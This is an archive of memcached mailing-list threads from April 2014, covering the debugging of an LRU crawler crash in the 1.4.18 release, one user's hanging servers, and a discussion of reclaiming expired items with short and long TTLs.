   Parse errors: Bad plan.  You planned 189 tests but ran 94.
 Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  
  2.27 cusr  0.35 csys =  3.43 CPU)
 Result: FAIL
 Makefile:1376: recipe for target 'test' failed
 make: *** [test] Error 1
 == ERROR: A failure occurred in check().
     Aborting...



 Running out of a git checkout on x86_64, I get slightly different 
  results:

 t/item_size_max.t  ok
 t/line-lengths.t . ok
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'
 # Looks like you failed 2 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
 Failed 2/189 subtests
 t/lru.t .. ok
 t/maxconns.t

Re: 1.4.18

2014-04-19 Thread dormando
On Sat, 19 Apr 2014, Dan McGee wrote:

 On Sat, Apr 19, 2014 at 1:45 PM, dormando dorma...@rydia.net wrote:
On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
      Well, that learns me for trying to write software without the 
 10+ VM
      buildbots...
   
      The i386 one, can you include the output of stats settings, 
 and also
      manually run: lru_crawler enable (or start with -o 
 lru_crawler) then run
      stats settings again please? Really weird that it fails 
 there, but not
      the lines before it looking for the OK while enabling it.
   
   
As soon as I type lru_crawler enable, memcached crashes. I see this 
 in dmesg.
   
[189571.108397] traps: memcached-debug[31776] general protection 
 ip:f7749988 sp:f47ff2d8 error:0 in
   libpthread-2.19.so[f7739000+18000]
[189969.840918] traps: memcached-debug[2600] general protection 
 ip:7f976510a1c8 sp:7f976254aed8 error:0 in
   libpthread-2.19.so[7f97650f9000+18000]
[195892.554754] traps: memcached-debug[31871] general protection 
 ip:f76f0988 sp:f46ff2d8 error:0 in
   libpthread-2.19.so[f76e+18000]
   
Starting with -o lru_crawler also crashes.
   
[195977.276379] traps: memcached-debug[2182] general protection 
 ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]
   
This is running both 32 bit and 64 bit executables on the same build 
 box; note in the above dmesg output that two of them appear to
   be from 32-bit
processes, and we also see a crash in what looks a lot like a 64 bit 
 pointer address, if I'm reading this right...

 Uhh... is your cross compile goofed?

 Any chance you could start the memcached-debug binary under gdb and then
 crash it the same way? Get a full stack trace.

 Thinking if I even have a 32bit host left somewhere to test with... will
 have to spin up the VM's later, but a stacktrace might be enlightening
 anyway.


 Program received signal SIGSEGV, Segmentation fault.
 [Switching to Thread 0xf7dbfb40 (LWP 7)]
 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
 (gdb) bt
 #0  0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
 #1  0xf7f790e0 in __pthread_mutex_unlock_usercnt () from 
 /usr/lib/libpthread.so.0
 #2  0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /usr/lib/libpthread.so.0
 #3  0x08061bfe in item_crawler_thread ()
 #4  0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0
 #5  0xf7ead94e in clone () from /usr/lib/libc.so.6

Holy crap lock elision. I have one machine with a haswell chip here, but
I'll have to USB boot. Is getting an Arch liveimage especially time
consuming?

https://github.com/dormando/memcached/tree/crawler_fix

Can you try this? The lock elision might've made my undefined behavior
mistake of not holding a lock before initially waiting on the condition
fatal.

A further fix might be required, as it's possible someone could kill the
do_etc flag before the thread fully starts and it'd drop out with the lock
held. That would be an incredible feat though.
  

   Thanks!

   
      On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
      from 3 to 8 and try again? I was trying to be clever but that 
 may not be
      working out.
   
   
Didn't change anything, same two failures with the same output listed.

 I feel like something's a bit different between your two tests. In the
 first set, it's definitely not crashing for the 64bit test, but not
 working either. Is something weird going on with the second set of tests?
 You noted it seems to be running a 32bit binary still.

 I'm willing to ignore the 64-bit failures for now until we figure out the 
 32-bit ones.

 In any case, I wouldn't blame the cross-compile or toolchain, these have all 
 been built in very clean, single architecture systemd-nspawn chroots.

Thanks, I'm just trying to reason why it's failing in two different ways.
The initial failure of finding 90 items when it expected 60 is a timing
glitch, the other ones are this thread crashing the daemon.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: 1.4.18

2014-04-19 Thread dormando
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf7dbfb40 (LWP 7)]
0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
(gdb) bt
#0  0xf7f7f988 in __lll_unlock_elision () from 
 /usr/lib/libpthread.so.0
#1  0xf7f790e0 in __pthread_mutex_unlock_usercnt () from 
 /usr/lib/libpthread.so.0
#2  0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /usr/lib/libpthread.so.0
#3  0x08061bfe in item_crawler_thread ()
#4  0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0
#5  0xf7ead94e in clone () from /usr/lib/libc.so.6

 Holy crap lock elision. I have one machine with a haswell chip here, but
 I'll have to USB boot. Is getting an Arch liveimage especially time
 consuming?


 Not at all; if you download the latest install ISO 
 (https://www.archlinux.org/download/) it is a live CD and you can boot 
 straight into an Arch
 environment. You can do an install if you want, or just run live and install 
 any necessary packages (`pacman -S base-devel gdb`) and go from there.

Okay, seems like I'll have to give it a shot since this still isn't
working well.
  

   https://github.com/dormando/memcached/tree/crawler_fix

   Can you try this? The lock elision might've made my undefined behavior
   mistake of not holding a lock before initially waiting on the condition
   fatal.

   A further fix might be required, as it's possible someone could kill the
   do_etc flag before the thread fully starts and it'd drop out with the 
 lock
   held. That would be an incredible feat though.


 The good news here is now that we found our way to lock elision, both 64-bit 
 and 32-bit builds (including one straight from git and outside the
 normal packaging build machinery) blow up in the same place. No segfault 
 after applying this patch, so we've made progress.

I love progress.

   
      Thanks!
   
      
             On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
             from 3 to 8 and try again? I was trying to be clever 
 but that may not be
             working out.
      
      
       Didn't change anything, same two failures with the same 
 output listed.
   
I feel like something's a bit different between your two tests. In the
first set, it's definitely not crashing for the 64bit test, but not
working either. Is something weird going on with the second set of 
 tests?
You noted it seems to be running a 32bit binary still.
   
I'm willing to ignore the 64-bit failures for now until we figure out 
 the 32-bit ones.
   
In any case, I wouldn't blame the cross-compile or toolchain, these 
 have all been built in very clean, single architecture
   systemd-nspawn chroots.

 Thanks, I'm just trying to reason why it's failing in two different ways.
 The initial failure of finding 90 items when it expected 60 is a timing
 glitch, the other ones are this thread crashing the daemon.


 One machine was an i7 with TSX, thus the lock elision segfaults. The other is 
 a much older Core2 machine. Enough differences there to cause
 problems, especially if we are dealing with threading-type things?

Can you give me a summary of what the core2 machine gave you? I've built
on a core2duo and nehalem i7 and they all work fine. I've also torture
tested it on a brand new 16 core (2x8) xeon.

 On the i7 machine, I think we're still experiencing segfaults. Running just 
 the LRU test; note the two undef values showing up again:

 $ prove t/lru-crawler.t
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'

 #   Failed test 'disabled lru crawler'
 #   at t/lru-crawler.t line 69.
 #  got: undef
 # expected: 'OK
 # '

 #   Failed test at t/lru-crawler.t line 72.
 #  got: undef
 # expected: 'no'
 # Looks like you failed 4 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 4 (wstat 1024, 0x400)
 Failed 4/189 subtests


 Changing the `sleep 3` to `sleep 8` gives non-deterministic results; two runs 
 in a row were different.

 $ prove t/lru-crawler.t
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'

 #   Failed test 'ifoo29 == 'ok''
 #   at /home/dan/memcached/t/lib/MemcachedTest.pm line 59.
 #  got: undef
 # expected: 'VALUE ifoo29 0 2
 # ok
 # END
 # '
 t/lru-crawler.t .. Failed 10/189 subtests

 Test Summary Report
 ---
 t/lru-crawler.t

Re: 1.4.18

2014-04-19 Thread dormando
 On Sat, Apr 19, 2014 at 6:05 PM, dormando dorma...@rydia.net wrote:
   
Once I wrapped my head around it, figured this one out. This cheap 
 patch fixes the test, although I'm not sure it is the best actual solution. 
 Because we don't set the lru_crawler_running flag on the main thread, but in 
 the LRU thread itself, we have a race condition here. pthread_create() is by 
 no means required to actually start the thread
   right away or
schedule it, so the test itself asks too quickly if the LRU crawler 
 is running, before the auxiliary thread has had the time to mark it as 
 running. The sleep ensures we at least give that thread time to start.
   
(Debugged by way of adding a print to STDERR statement in the 
 while(1) loop. The only time I saw the test actually pass was when that loop 
 caught and repeated itself for a while. It failed when it only ran once, 
 which would make sense if the thread hadn't actually set the flag yet.)

 Ahh okay. Weird that you're able to see that, as the crawl command signals
 the thread. Hmm... no easy way to tell if it *had* fired or if it's not
 yet fired.

 The parts I thought really hard about seem to be doing okay, but the
 scaffolding I apparently goofed fairly bad, heh.

 I just pushed another commit to the crawler_fix tree, can you try it and
 see if it works with an unmodified test?


 We're good to go now, as far as I can tell. Ran the LRU test about 10 times 
 on both machines I've been using today and it works every time now; no 
 problems with the full test suite at this point either.

Cool, thanks again. I just pushed these changes to master. I kinda want to
find some other stuff to put in before shoveling out a .19 though. Are you
a packager for Arch? Can you ship .18 with the patches?

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached somhow hangs or stoppes working

2014-04-17 Thread dormando
exhausted memory isn't going to cause it to pause...

http://memcached.org/timeouts for the typical run-through of timeout
problems.

On Tue, 15 Apr 2014, Suraj Narkhede wrote:

 Or maybe its like you have exhausted your memory. Can you please check in the 
 stats if there is any eviction_count? This problem will also get
 solved once the memcache is restarted.

 Suraj


 On Tue, Apr 15, 2014 at 1:14 PM, Jon Hauksson jon.hauks...@storytel.com 
 wrote:
   Hi, 
 thanks for the answers. We will try to upgrade. Yes, it does not work just to 
 flush the memcached we have to restart them so maybe its
 the persistent connections

 Den måndagen den 14:e april 2014 kl. 19:50:01 UTC+2 skrev Jon Hauksson:
   Hi,
 I work at company where we use memcached and suddenly it stoppes working 
 every like 3 days. We did not really catch the problem at
 first but now we have narrowed it down to memcached. Every time we restart 
 our 2 memcached servers the system gets under control again.
 But when this happens we do not see any real problems in the logs etc...but 
 it comes back after restart of the memcached. It does not
 work to just flush. If somebody has some information on what the problem 
 could be it would be appreciated.

 We have 2 memcached servers on cent os and the startup options are:

 memcached -d -m 4096 -c 4096 -t 25

 Thanks,
 Jon

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


LRU Crawler + stuff for 1.4.18

2014-04-17 Thread dormando
Yo,

A bunch of good fixes from Steven Grimm went into master a few months ago,
but I was too busy to finish the release. I've thrown in a few more things
and we'll call this 1.4.18 shortly, unless someone finds a major flaw:

Steven fixed a bunch of potential reference leaks, and added a stats
conns command:
https://github.com/memcached/memcached/pull/60

I made the hash algo selectable (existing jenkins, murmurhash3 to start
with):
https://github.com/memcached/memcached/pull/66

and an LRU crawler:
https://github.com/memcached/memcached/pull/64

Just want to do two more tiny commits on the crawler before merging and
releasing the whole thing I think. Unless someone has major ideas/etc?
I spent a little bit of time benchmarking it and it seems to be
functioning fine, but I didn't go into a ton of depth in the torture. If
the feature isn't enabled the code paths don't do anything at all, so if
something is broken it won't harm people.

have fun,
-Dormando

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


1.4.18

2014-04-17 Thread dormando
http://code.google.com/p/memcached/wiki/ReleaseNotes1418

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached somhow hangs or stoppes working

2014-04-14 Thread dormando
What version are you using? If less than 1.4.17, please upgrade to the
latest version.

Also, -t 25 is a huge waste. Use -t 4 unless you're doing more than
several hundred thousand requests per second.

On Mon, 14 Apr 2014, Jon Hauksson wrote:

 Hi,
 I work at company where we use memcached and suddenly it stoppes working 
 every like 3 days. We did not really catch the problem at first but now we
 have narrowed it down to memcached. Every time we restart our 2 memcached 
 servers the system gets under control again. But when this happens we do
 not see any real problems in the logs etc...but it comes back after restart 
 of the memcached. It does not work to just flush. If somebody has some
 information on what the problem could be it would be appreciated.

 We have 2 memcached servers on cent os and the startup options are:

 memcached -d -m 4096 -c 4096 -t 25

 Thanks,
 Jon

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Idea for reclaimation algo

2014-04-13 Thread dormando
Yes :) If I recall how that works, it's mildly similar to a few other
things I've seen. Not super trivial to implement in a short period of time
though.

On Sat, 12 Apr 2014, Ryan McElroy wrote:

 Facebook implemented a visitor plugin system that we use to kick out 
 already-expired items in our memcached instances. It runs at low priority
 and doesn't cause much latency that we notice. I should really get our 
 version back out there so that others can see how we did it and implement it
 in the legit memcached :-)
 ~Ryan


 On Fri, Apr 11, 2014 at 11:08 AM, dormando dorma...@rydia.net wrote:
   s/pagging/padding/. gah.

   On Fri, 11 Apr 2014, dormando wrote:

   
   
On Fri, 11 Apr 2014, Slawomir Pryczek wrote:
   
 Hi Dormando, more about the behaviour... when we're using normal 
 memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we
   start to have
 almost instant evictions of needed items (again these items aren't 
 really needed individually, just when many of them gets
   evicted it's
 unacceptable because of how badly it affects the system)
   
Almost instant evictions; so an item is stored, into a 16GB instance, 
 and
 120 seconds later is bumped out of the LRU?
   
You'll probably just ignore me again, but isn't this just slab 
 imbalance?
Once your instance fills up there're probably a few slab classes with 
 way
too little memory in them.
   
'stats slabs' shows you per-slab eviction rates, along with the last
accessed time of an item when it was evicted. What does this look 
 like on
one of your full instances?
   
The slab rebalance system lets you plug in your own algorithm by 
 running
the page reassignment commands manually. Then you can smooth out the 
 pages
to where you think they should be.
   
You mention long and short TTL, but what are they exactly? 120s and an
hour? A week?
   
I understand your desire to hack up something to solve this, but as 
 you've
already seen scanning memory to remove expired items is problematic:
you're either going to do long walks from the tail, use a background
thread and walk a probe item through, or walk through random slab 
 pages
looking for expired memory. None of these are very efficient and tend 
 to
rely on luck.
   
A better way to do this is to bucket the memory by TTL. You have lots 
 of
pretty decent options for this (and someone else already suggested 
 one):
   
- In your client, use different memcached pools for major TTL buckets 
 (ie;
one instance only gets long items, one only short). Make sure the 
 slabs
aren't imbalanced via the slab rebalancer.
   
- Are the sizes of the items correlated with their TTL? Are 120s items
always in a ~300 byte range and longer items tend to be in a different
byte range? You could use length pagging to shunt them into specific 
 slab
classes, separating them internally at the cost of some ram 
 efficiency.
   
- A storage engine (god I wish we'd made 1.6 work...) which allows
bucketing by TTL ranges. You'd want a smaller set of slab classes to 
 not
waste too much memory here, but the idea is the same as running 
 multiple
individual instances, except internally splitting the storage engine
instead and storing everything in the same hash table.
   
Those three options completely avoid latency problems, the first one
requires no code modifications and will work very well. The third is 
 the
most work (and will be tricky due to things like slab rebalance, and 
 none
of the slab class identification code will work). I would avoid it 
 unless
I were really bored and wanted to maintain my own fork forever.
   
 ~2 years ago i created another version based on that 1.4.13, than 
 does garbage collection using custom stats handler. That version
   is able to be
 running on half of the memory for like 2 weeks, with 0 evictions. 
 But we gave it full 16G and just restart it each week to be sure
   memory usage is
 kept in check, and we're not throwing away good data. Actually 
 after changing -f1.25 to -f1.041 the slabs are filling with bad
   items much slower,
 because items are distributed better and this custom eviction 
 function is able to catch more expired data. We have like 200GB of
   data evicted this
 way, daily. Because of volume (~40k req/s peak, much of it are 
 writes) and differences in expire time LRU isn't able to reclaim
   items efficiently.

 Maybe people don't even realize the problem, but when we done some 
 testing and turned off that custom eviction we had like 100%
   memory used

Re: Idea for reclaimation algo

2014-04-13 Thread dormando
 Hey Dormando...

 Some quick question first... i have checked some Intel papers on their 
 memcached fork and for 1.6 it seems that there's some rather big lock
 contention... have you thought about just gluing individual items to a 
 thread, using maybe item hash or some configurable method... this way 2
 threads won't be able to access same item at one time. I'm wondering what 
 whould be problems with such approach because it seems rational at first
 glance, instead of locking the whole cache... im just curious. Is there some 
 release plan for 1.6... i think 2-3 years ago it was in
 developement... you're getting closer to releasing it?

1.4 tree has much less lock contention than 1.6. I made repeated calls for
people to help pull bugs out of 1.6 and was ignored, so I ended up
continuing development against 1.4... There's no whole-cache lock in 1.4,
there's a whole-LRU lock but the operations are a lot shorter. It's much
much faster than the older code.

 Im not ignoring your posts, actually i read them but didn't want that my 
 posts were too large. Actually we tried using several other things beside
 memcached. After switching from mysql with some memory tables to memcached ~2 
 years ago measured throughput went from 40-50 req/s to about 4000
 r/s. Back then it was fine, then when traffic went higher the cache was no 
 longer able to evict items almost at all.

 Changing infrastructure in project that was in developement for over 2 years 
 is not easy thing. We also tested some other things like mongodb,
 redis back then... and we just CAN'T have this data to be hitting disks. 
 Maybe now there are more options, but we are already considering golang or
 C rewrite for this part... we don't want to switch to some other shared 
 memory-ish system, just be able to access data directly between calls and
 do locking ourselves.

 So, again, as for current solution, decisions about what tools we use were 
 made a very long time ago, and are not easy to change now.

 Almost instant evictions; so an item is stored, into a 16GB instance, and  
 120 seconds later is bumped out of the LRU? 

 Yes, the items we insert for TTL=120 to 500s are not able to hold in cache 
 even for 60s, when we start to read/aggregate them, and are thrown away
 instead of garbage. I understand why is that...
 S - short TTL
 L - long TTL
 SSSLSSS - when we insert L item, no S items before L will be able to get 
 reclaimed, with current algo, ever. Because new L items, will appear
 later too... for LRU to work optimially under high loads, every item should 
 have nearly the same TTL in given slab. You could try to reclaim from
 top and bottom but this way one hold forever item would break the whole 
 thing as soon as it't get to top.

I understand this part, I just find it suspicious.

 Longest items in pool are set for 5-6h. And unfortunately item size is no way 
 correlated to TTL. We eg. store UA analyze and geo data for 5h. These
 items are very short, as short as eg. impression counters.

Ok. Any idea what the ratio to long to short is? like 10% 120s, 90% 5h, or
reverse or whatever?

 You'll probably just ignore me again, but isn't this just slab imbalance? 
 No it isn't... how in hell can slab imbalance happen over just 1h, without 
 code changes ;)

I can make slab imbalance happen in under 10 seconds. Not really the
point: Slab pages are pulled from the global pool as-needed as memory
fills. If your traffic has ebbs and flows, or tends to set a lot more
items in one class than others it will immediately fill and others will
starve.

 A better way to do this is to bucket the memory by TTL. You have lots of 
 pretty decent options for this (and someone else already suggested one)
 Sure, if we knew back then we'd just create 3-4 memcached instances, add some 
 API and shard the items based on requested TTL.

You can't do that now? That doesn't really seem that hard and doesn't
change the fundamental infrastructure... It'd be a lot easier than
maintaining your own fork of memcached forever, I'd think.

 The slab rebalance system lets you plug in your own algorithm by running 
 the page reassignment commands manually. Then you can smooth out the
 pages 
 to where you think they should be. 
 Sure, but that's actually not my problem... the problem is that im having 
 full of expired items, so this would require some hacking of that slab
 rebalance algo (am i right?)... and it seems a little complicated to me, to 
 be done in 3-4 days time.

Bleh.

 A better way to do this is to bucket the memory by TTL. You have lots of 
 pretty decent options for this (and someone else already suggested one)Haha, 
 sure it's better :) We'd obviously have done that if we knew 2 years
 ago what we know now :)

 I actually wrote a quick code to redirect about 20% of traffic we're 
 sending/receiving to/from memcached to my hacked version... for all times
 on screens you neet to do minus 5 minutes (we run memcached, then enabled the 
 code 5

Re: Idea for reclaimation algo

2014-04-13 Thread dormando
 On Sun, 13 Apr 2014, Slawomir Pryczek wrote:

  So high evictions when cleaning algo isn't enabled could be caused by slab 
  imbalance due to high-memory slabs eating most of ram... and i just
  incorrectly assumed low TTL items are expired before high TTL items, 
  because in such cases the cache didn't have enough memory to store all low 
  TTL
  items, and both - low and high TTL's were evicted, interesting...

 yes.

  So you're saying if i set some item X, to evict it - i'd need to write AT 
  LEAST as many new items as as X's slab contains, because item will be
  added on head, and you're removing from tail, right?

 yes. It's actually worse than that, since deleting items or fetching
 expired ones will make extra room, slowing it down.

Actually, even worse than that still: During an allocation the
*bottommost* item in the LRU is always checked for expiration before more
memory is assigned. (this is the 'reclaimed' stat). So if you have a cache
with only items of a TTL 60s, you will stop assigning memory if you set
into the cache slower than they expire.

  Sending some slab stats, and TTL left for slab 1 where there are no 
  evictions + slab 2 where there is plenty. Unfortunately i can't send dumps 
  as
  these contain some sensitive data.
  http://img.liczniki.org/20140414/slabs_all_918-1397431358.png

 Can you *please* sent a text dump of stats items and stats slabs? Just
 grep out or censor what you don't want to share? Doing math against a
 picture is a huge annoyance. It's also missing important counters I'd like
 to look at.

  For ratio of long/short hard to tell... but most are definitely short.
 
  Slab class 3 has 1875968 total chunks in your example, which means in 
  order to cause a 120s item to evict early you need to insert into *that 
  slab class* at a rate of 15,000 items per second, unless it's a multi-hour 
  item instead. In which case what you said is happening but reversed: lots 
  of junk 120s items are causing 5hr items to evict, but after many minutes 
  and definitely not mere seconds. 
 
  Yes but as you can see this class only contains 15% of valid data and have 
  plenty of evictions. The next class contains 7% valid data, but still
  have 4 evictions. Probably would be best just to keep TTLs same for all 
  data...

 Your main complaint has been that 120s values don't persist for more than
 60s, there's a 0% chance of any items in slab class 3 having a TTL of
 120s.

 If you kept the TTL's all the same, what would they be? If they were all
 120s and you rebalanced slabs, you'd probably never have a problem (but
 it seemed like you needed some data for longer).

 
 
 
 
 
 
 
 
  W dniu niedziela, 13 kwietnia 2014 21:12:43 UTC+2 użytkownik Dormando 
  napisał:
 Hey Dormando...

 Some quick question first... i have checked some Intel papers on 
  their memcached fork and for 1.6 it seems that there's some rather
big lock
 contention... have you thought about just gluing individual items 
  to a thread, using maybe item hash or some configurable method...
this way 2
 threads won't be able to access same item at one time. I'm 
  wondering what whould be problems with such approach because it seems
rational at first
 glance, instead of locking the whole cache... im just curious. Is 
  there some release plan for 1.6... i think 2-3 years ago it was in
 developement... you're getting closer to releasing it?
 
1.4 tree has much less lock contention than 1.6. I made repeated 
  calls for
people to help pull bugs out of 1.6 and was ignored, so I ended up
continuing development against 1.4... There's no whole-cache lock in 
  1.4,
there's a whole-LRU lock but the operations are a lot shorter. It's 
  much
much faster than the older code.
 
 Im not ignoring your posts, actually i read them but didn't want 
  that my posts were too large. Actually we tried using several other
things beside
 memcached. After switching from mysql with some memory tables to 
  memcached ~2 years ago measured throughput went from 40-50 req/s to
about 4000
 r/s. Back then it was fine, then when traffic went higher the cache 
  was no longer able to evict items almost at all.

 Changing infrastructure in project that was in developement for 
  over 2 years is not easy thing. We also tested some other things like
mongodb,
 redis back then... and we just CAN'T have this data to be hitting 
  disks. Maybe now there are more options, but we are already
considering golang or
 C rewrite for this part... we don't want to switch to some other 
  shared memory-ish system, just be able to access data directly
between calls and
 do locking ourselves.

 So, again, as for current solution, decisions about what tools we 
  use were made a very long time ago, and are not easy

Re: Idea for reclaimation algo

2014-04-11 Thread dormando


On Fri, 11 Apr 2014, Slawomir Pryczek wrote:

 Hi Dormando, more about the behaviour... when we're using normal memcached 
 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have
 almost instant evictions of needed items (again these items aren't really 
 needed individually, just when many of them gets evicted it's
 unacceptable because of how badly it affects the system)

Almost instant evictions; so an item is stored, into a 16GB instance, and
 120 seconds later is bumped out of the LRU?

You'll probably just ignore me again, but isn't this just slab imbalance?
Once your instance fills up there're probably a few slab classes with way
too little memory in them.

'stats slabs' shows you per-slab eviction rates, along with the last
accessed time of an item when it was evicted. What does this look like on
one of your full instances?

The slab rebalance system lets you plug in your own algorithm by running
the page reassignment commands manually. Then you can smooth out the pages
to where you think they should be.

You mention long and short TTL, but what are they exactly? 120s and an
hour? A week?

I understand your desire to hack up something to solve this, but as you've
already seen scanning memory to remove expired items is problematic:
you're either going to do long walks from the tail, use a background
thread and walk a probe item through, or walk through random slab pages
looking for expired memory. None of these are very efficient and tend to
rely on luck.

A better way to do this is to bucket the memory by TTL. You have lots of
pretty decent options for this (and someone else already suggested one):

- In your client, use different memcached pools for major TTL buckets (ie;
one instance only gets long items, one only short). Make sure the slabs
aren't imbalanced via the slab rebalancer.

- Are the sizes of the items correlated with their TTL? Are 120s items
always in a ~300 byte range and longer items tend to be in a different
byte range? You could use length pagging to shunt them into specific slab
classes, separating them internally at the cost of some ram efficiency.

- A storage engine (god I wish we'd made 1.6 work...) which allows
bucketing by TTL ranges. You'd want a smaller set of slab classes to not
waste too much memory here, but the idea is the same as running multiple
individual instances, except internally splitting the storage engine
instead and storing everything in the same hash table.

Those three options completely avoid latency problems, the first one
requires no code modifications and will work very well. The third is the
most work (and will be tricky due to things like slab rebalance, and none
of the slab class identification code will work). I would avoid it unless
I were really bored and wanted to maintain my own fork forever.

 ~2 years ago i created another version based on that 1.4.13, than does 
 garbage collection using custom stats handler. That version is able to be
 running on half of the memory for like 2 weeks, with 0 evictions. But we gave 
 it full 16G and just restart it each week to be sure memory usage is
 kept in check, and we're not throwing away good data. Actually after changing 
 -f1.25 to -f1.041 the slabs are filling with bad items much slower,
 because items are distributed better and this custom eviction function is 
 able to catch more expired data. We have like 200GB of data evicted this
 way, daily. Because of volume (~40k req/s peak, much of it are writes) and 
 differences in expire time LRU isn't able to reclaim items efficiently.

 Maybe people don't even realize the problem, but when we done some testing 
 and turned off that custom eviction we had like 100% memory used with
 10% of waste reported by memcached admin. But then we run that custom 
 eviction algorithm it turned out that 90% of memory is occupied by garbage.
 Waste reported grew to 80% instantly after running unlimited reclaim 
 expired on all items in the cache. So in standard client when people will
 be using different expire times for items (we have it like 1minute minimum, 
 6h max)... they even won't be able to see how much memory they're
 wasting in some specific cases, when they'll have many items that won't be 
 hit after expiration, like we have.

 When using memcached as a buffer for mysql writes, we know exactly what to 
 hit and when. Short TTL expired items, pile up near the head... long TTL
 live items pile up near the tail and it's creating a barrier that prevents 
 the LRU algo to reclaim almost anything, if im getting how it
 currently works, correctly...

 You made it sound like you had some data which never expired? Is this true? 
 Yes, i think because of how evictions are made (to be clear we're not setting 
 non-expiring items). These short expiring items pile up in the front
 of linked list, something that is supposed to live for eg. 120 or 180 seconds 
 is lingering in memory forever, untill we restart the cache... and
 new items are killed

Re: Idea for reclaimation algo

2014-04-11 Thread dormando
s/pagging/padding/. gah.

On Fri, 11 Apr 2014, dormando wrote:



 On Fri, 11 Apr 2014, Slawomir Pryczek wrote:

  Hi Dormando, more about the behaviour... when we're using normal 
  memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have
  almost instant evictions of needed items (again these items aren't really 
  needed individually, just when many of them gets evicted it's
  unacceptable because of how badly it affects the system)

 Almost instant evictions; so an item is stored, into a 16GB instance, and
  120 seconds later is bumped out of the LRU?

 You'll probably just ignore me again, but isn't this just slab imbalance?
 Once your instance fills up there're probably a few slab classes with way
 too little memory in them.

 'stats slabs' shows you per-slab eviction rates, along with the last
 accessed time of an item when it was evicted. What does this look like on
 one of your full instances?

 The slab rebalance system lets you plug in your own algorithm by running
 the page reassignment commands manually. Then you can smooth out the pages
 to where you think they should be.

 You mention long and short TTL, but what are they exactly? 120s and an
 hour? A week?

 I understand your desire to hack up something to solve this, but as you've
 already seen scanning memory to remove expired items is problematic:
 you're either going to do long walks from the tail, use a background
 thread and walk a probe item through, or walk through random slab pages
 looking for expired memory. None of these are very efficient and tend to
 rely on luck.

 A better way to do this is to bucket the memory by TTL. You have lots of
 pretty decent options for this (and someone else already suggested one):

 - In your client, use different memcached pools for major TTL buckets (ie;
 one instance only gets long items, one only short). Make sure the slabs
 aren't imbalanced via the slab rebalancer.

 - Are the sizes of the items correlated with their TTL? Are 120s items
 always in a ~300 byte range and longer items tend to be in a different
 byte range? You could use length pagging to shunt them into specific slab
 classes, separating them internally at the cost of some ram efficiency.

 - A storage engine (god I wish we'd made 1.6 work...) which allows
 bucketing by TTL ranges. You'd want a smaller set of slab classes to not
 waste too much memory here, but the idea is the same as running multiple
 individual instances, except internally splitting the storage engine
 instead and storing everything in the same hash table.

 Those three options completely avoid latency problems, the first one
 requires no code modifications and will work very well. The third is the
 most work (and will be tricky due to things like slab rebalance, and none
 of the slab class identification code will work). I would avoid it unless
 I were really bored and wanted to maintain my own fork forever.

  ~2 years ago i created another version based on that 1.4.13, than does 
  garbage collection using custom stats handler. That version is able to be
  running on half of the memory for like 2 weeks, with 0 evictions. But we 
